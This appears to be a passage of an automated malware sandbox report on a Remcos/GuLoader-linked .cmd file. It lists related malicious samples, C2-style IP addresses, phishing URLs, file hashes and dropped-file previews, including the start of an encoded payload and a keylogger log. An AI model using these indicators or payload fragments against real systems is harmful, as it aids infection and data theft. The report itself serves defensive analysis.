                                                                            doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            957URl9ErB.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            • 45.88.90.160
                                                                            57O67GbOCj.elfGet hashmaliciousMiraiBrowse
                                                                            • 94.154.174.111
                                                                            x1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                                                                            • 153.13.37.94
                                                                            fbW42zYly3.elfGet hashmaliciousMiraiBrowse
                                                                            • 206.165.107.221
                                                                            NBcTP7MyXM.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 45.88.90.17
                                                                            SBZG0flucJ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 45.88.90.17
                                                                            Sl8HmMfNnr.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 45.88.90.17
                                                                            50eBWGCFKc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 45.88.90.17
                                                                            ATOM86-ASATOM86NLGVV.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50
                                                                            202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50
                                                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            28a2c9bd18a11de089ef85a160da29e4http://cuts.kr/APFXMGet hashmaliciousUnknownBrowse
                                                                            • 13.85.23.86
                                                                            https://gamma.app/docs/Untitled-9umekc4egyknsobGet hashmaliciousHTMLPhisherBrowse
                                                                            • 13.85.23.86
                                                                            9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 13.85.23.86
                                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                            • 13.85.23.86
                                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                            • 13.85.23.86
                                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                            • 13.85.23.86
                                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                            • 13.85.23.86
                                                                            https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                                                                            • 13.85.23.86
                                                                            http://collectionsystem.veconinter.com:8002/Default.aspx?Pais=TMVb4l9krDsyWtcOACvZcw==&Tipo=5vw2xkejLdEpXNK8ckiYpA==&Val=Ju61jJ3lX3gIjnPLX+eDdQ==&Id=3243049&VR=1Get hashmaliciousUnknownBrowse
                                                                            • 13.85.23.86
                                                                            opp.scr.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.85.23.86
                                                                            37f463bf4616ecd445d4a1937da06e195801.xlsGet hashmaliciousUnknownBrowse
                                                                            • 46.254.34.12
                                                                            RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 46.254.34.12
                                                                            325445263.imgGet hashmaliciousUnknownBrowse
                                                                            • 46.254.34.12
                                                                            Fact.NaturgyID300S220404024NOPA22442452256676545245PDR2PD04LF.msiGet hashmaliciousUnknownBrowse
                                                                            • 46.254.34.12
                                                                            Purchase Order05022024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 46.254.34.12
                                                                            Notice.xlsGet hashmaliciousUnknownBrowse
                                                                            • 46.254.34.12
                                                                            JlvRdFpwOD.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                            • 46.254.34.12
                                                                            00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 46.254.34.12
                                                                            Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 46.254.34.12
                                                                            DATASHEET rfq.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 46.254.34.12

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):1.3264036310625809
                                                                            Encrypted:false
                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrG:KooCEYhgYEL0In
                                                                            MD5:612365C942234C10AA53212A4E0CEA74
                                                                            SHA1:F9E6A9AA38BF317C675B48D0DBD02AF2B5CCF363
                                                                            SHA-256:2794D5559B9816338176739CB7A0E377BE59B005F7C966EBB7A561044C83FC74
                                                                            SHA-512:7B8BFC8CA04A2DFCEC538F6FF691496090D0230363CB1377796391E9F1D04F2E6126D6343FF0B5F07BF49B91E39ECABF5DBAFA0345A1603C8FB05DAD9046D9E2
                                                                            Malicious:false
                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa4c44316, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.42214561796448674
                                                                            Encrypted:false
                                                                            SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                                            MD5:7F1795C99BE72D4323EE9483367E53E1
                                                                            SHA1:AD3925BE649BC8576596E7D4DA97EDD3B0FAC69C
                                                                            SHA-256:DD9B6BE4360E0F8ACA93A331AD2E85C0BD6A38B88B1DF08E85B066D0AF206E56
                                                                            SHA-512:109E152624C0EDA506E5B1A226FFB1F76558378D33195A8DCE265EDBE7E65C4CB5CF938034265046B69830A04831219B08B366655ECB8E8B2510D41FAAE557B1
                                                                            Malicious:false
                                                                            Preview:..C.... .......A.......X\...;...{......................0.!..........{A......|e.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................H..p.....|.....................w.....|e..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.07735018400703877
                                                                            Encrypted:false
                                                                            SSDEEP:3:btyYec5SuGjjn13a/SY+H/AllcVO/lnlZMxZNQl:4zxuGj53qFQAOewk
                                                                            MD5:C8AEFFC9265D039D42C0F661C60D9CF8
                                                                            SHA1:346C243F5D0FB677A78AB648C3CC19E50463B9FF
                                                                            SHA-256:A1DF2BCF55B91413F2C83B4DE0E8CB76E66D72415A493785E8E291BE955E07AC
                                                                            SHA-512:C1BAF9E5BDCC8BB3F38413961E3EA44B59E3A2844C764FFED822AAD1609E84AEBB0316856A7D1F2965D2E4261EE5AAEC8A29B49E830E82C7C4CD0ABB9BC14BD5
                                                                            Malicious:false
                                                                            Preview:.H.u.....................................;...{.......|e......{A..............{A......{A..........{A]...................w.....|e.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):965
                                                                            Entropy (8bit):5.023840386167536
                                                                            Encrypted:false
                                                                            SSDEEP:12:tkhXkmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qhXldRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                            MD5:35B07141970464FE1515126EE76D86C8
                                                                            SHA1:BF560D7B92845B6DE04C7716CE1B62E4637E62E5
                                                                            SHA-256:B2A7CD5C3E618A0ADFAA1B65E49A88B29060CA7C165DB516C5B32D376A12D4E0
                                                                            SHA-512:D79DA10444FA33DDD7CE1DC12649D16E3E50C8E7E956487A62D9BAFC887F0C1B6B3761AE0E01ED5F72D86E078AD3897DC97A99F625E8FECA60F683D720C9BCD0
                                                                            Malicious:false
                                                                            Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):11608
                                                                            Entropy (8bit):4.886255615007755
                                                                            Encrypted:false
                                                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jds3a5p.p3n.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x5u0sid.ubx.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2y50u2q.jnp.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jup5mnvd.q55.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6221
                                                                            Entropy (8bit):3.730626427732995
                                                                            Encrypted:false
                                                                            SSDEEP:48:mOe3MiLPr3C4U28djQukvhkvklCywhmdjUU8lRBSogZoEDUU8l4BSogZow1:PJi33CxHdNkvhkvCCt+UU88HFUU8bHv
                                                                            MD5:073D19E4C7B469C55105F365120DA656
                                                                            SHA1:42EE0268A8DBE6E4BE553BFC03BF400AF5DD9FC6
                                                                            SHA-256:EA8D300713D490F668636F6A30017D59E9CCE214D2E64448EB9C7FFC9BD552FB
                                                                            SHA-512:F78DBF5F117C825F6841DB170DE74A40812D3D4A1AC103B1AABDB6AC2C6A0EC199DBE6E69A3DA42B52CEF4F2FF55B325DA7A25A903F24B72A262DBAABE615B32
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. ...-/.v.....^.S....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....C..O......S........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.z...........................%..A.p.p.D.a.t.a...B.V.1......X.z..Roaming.@......CW.^.X.z............................1.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.z..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..........................=E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.z....Q...........

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSZK7E8O5BW8JL21KDF5.temp

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6221
                                                                            Entropy (8bit):3.730626427732995
                                                                            Encrypted:false
                                                                            SSDEEP:48:mOe3MiLPr3C4U28djQukvhkvklCywhmdjUU8lRBSogZoEDUU8l4BSogZow1:PJi33CxHdNkvhkvCCt+UU88HFUU8bHv
                                                                            MD5:073D19E4C7B469C55105F365120DA656
                                                                            SHA1:42EE0268A8DBE6E4BE553BFC03BF400AF5DD9FC6
                                                                            SHA-256:EA8D300713D490F668636F6A30017D59E9CCE214D2E64448EB9C7FFC9BD552FB
                                                                            SHA-512:F78DBF5F117C825F6841DB170DE74A40812D3D4A1AC103B1AABDB6AC2C6A0EC199DBE6E69A3DA42B52CEF4F2FF55B325DA7A25A903F24B72A262DBAABE615B32
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. ...-/.v.....^.S....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....C..O......S........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.z...........................%..A.p.p.D.a.t.a...B.V.1......X.z..Roaming.@......CW.^.X.z............................1.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.z..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..........................=E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.z....Q...........

                                                                            C:\Users\user\AppData\Roaming\Pleurothotonus.Dil

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):434544
                                                                            Entropy (8bit):5.9769967979381535
                                                                            Encrypted:false
                                                                            SSDEEP:6144:NBXoBavqRevWWBngpxZwxLIrQN2VmHlHrNvKNo4teKyad8019ebiaHjK:NlogO5Wdg/qxLIsN2VwHrNt4tU8sXHjK
                                                                            MD5:9DD669D385B1E1C723A1A9F0D2DB8998
                                                                            SHA1:E14218E850F50F64BCD4C3F68EBCFE483B1F5F45
                                                                            SHA-256:3170F4AE0528F9AC45ADD13828E68C6B5C6E17755F94DA373761CBDDF1F19478
                                                                            SHA-512:8D001EB7D0E2C3C85C3DD536FAA89F565F8978FA24BE8EFCCAB88B7C6E4F33D3BF870F6B71AC2FB456DB9D619A8966A12BD7113CC97F44F39A9E3E52661DF1BD
                                                                            Malicious:false
                                                                            Preview:6wLUVXEBm7v0XQwAcQGb6wJOXANcJATrAnQEcQGbuUQgS3/rAhDTcQGbgcEpoeXH6wJpzXEBm4HpbcEwR+sCuyDrAon76wJ01OsCF1+6Ja0rmnEBm3EBm3EBm3EBmzHK6wJdDesCrPaJFAtxAZvrAvb00eLrAm63cQGbg8EE6wJQlesCL1iB+cwkUgF8ynEBm+sCxh6LRCQE6wJwOnEBm4nD6wLszOsC0kyBwwO6jQBxAZtxAZu6SSwYwOsCaMNxAZuB8lkl367rAqwu6wINI4HC8PY4kesCT+TrAg+o6wIIJ3EBm3EBm3EBm4sMEOsCLixxAZuJDBPrAgEI6wIbtULrAr5McQGbgfqsjQQAddVxAZtxAZuJXCQMcQGbcQGbge0AAwAA6wKNtOsCXS2LVCQIcQGb6wJjXYt8JATrAjKG6wIKbInrcQGb6wLppIHDnAAAAHEBm3EBm1NxAZtxAZtqQHEBm+sCH1aJ63EBm3EBm8eDAAEAAACQYQHrAqz96wKhnIHDAAEAAHEBm3EBm1PrApoL6wJc+onrcQGb6wL7rIm7BAEAAOsCmLDrAkvogcMEAQAAcQGbcQGbU+sCxvlxAZtq/+sC7FbrAujtg8IF6wIpi+sCNfox9nEBm+sCUSYxyesC2R9xAZuLGnEBm3EBm0FxAZtxAZs5HAp19OsCHQlxAZtGcQGb6wKLrIB8Cvu4dd5xAZvrAsDIi0QK/HEBm+sCQ3sp8OsCq1ZxAZv/0nEBm3EBm7qsjQQAcQGbcQGbMcDrAkg06wLBzYt8JAxxAZtxAZuBNAcXTENl6wJO2OsC7q6DwATrAmDQ6wKydznQdeJxAZvrAvuVifvrAkza6wLgof/XcQGb6wId5S+Gwp/wj0lwL5/KgJ4Zm99naxPZlo50nUZawpfAgzuLlr4zts1warGcGZswnqn6X0oEdOTmhtDalMy++pa9zZY1Cnu9lr0lWMK+FNqB45xulrP9ZRdMTOmnNkdlSIsH

                                                                            C:\Users\user\AppData\Roaming\mvourhjs.dat

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):476
                                                                            Entropy (8bit):3.5023161313492417
                                                                            Encrypted:false
                                                                            SSDEEP:6:6lDC5YcIeeDAlMlDeljlR1SlDelb+SkyGkNlw+SkSX81AEl4lFcUyAe5UlDelFRk:6lWecmlujcluqUNvsvXHe5Ulu8luubW+
                                                                            MD5:874E26D495FB6A444AFECB842C40F4EB
                                                                            SHA1:C86FCFC535D4D773EA3A28F8847D1A6E68DFE24B
                                                                            SHA-256:BC18251F107D6A8FB8AA1DFF6117A0105B675277499655F0BDA59508398492D8
                                                                            SHA-512:4F48796904702A5B8720482539FD7DB6C2B95A79CBB170487057C1CB2B2953B7679A13E5B1A47491D66367ED9147FA8EC058486EE5BA348A39F5749EEDFC5F40
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Author: Joe Security
                                                                            Preview:....[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.0.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.1. .R.u.n.].........[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.5. .c.:.\.w.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.].....[.W.i.n.].r.....[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.5. .R.u.n.].........[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                            Static File Info

                                                                            General

                                                                            File type:ASCII text, with very long lines (5881), with no line terminators
                                                                            Entropy (8bit):5.317909268152527
                                                                            TrID:
                                                                              File name:Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
                                                                              File size:5'881 bytes
                                                                              MD5:69288c7e16a8ce2177346b2c62231603
                                                                              SHA1:87f0dad6634d4e6bedad3b505adb6c509fdc5f03
                                                                              SHA256:b523b20d9df02eaf3cdbb3babbc50ac7cea1889c7a3f561d586b001c02615f8a
                                                                              SHA512:2b4035d3c147b53a28514d6ae03224ab16a68d6db122d213bd59f9bc85858bf74a26b57e3a4cead6a996b2dcdb530d7a669e72b79ee67d4f725e5dcbdc6306ef
                                                                              SSDEEP:96:W2J7XNnRpI3qk7SSeg72yJjXrGMD5ZIYDBFSxGf1uTiEVc/W5EyQcvckuh:h5twqk7SSN7bBZHFs1DV8YXtcD
                                                                              TLSH:D2C16DAF66E783AC04C42F558A0AC3852F4DC526330B1A4C059649A36DABE3E5CFDF4C
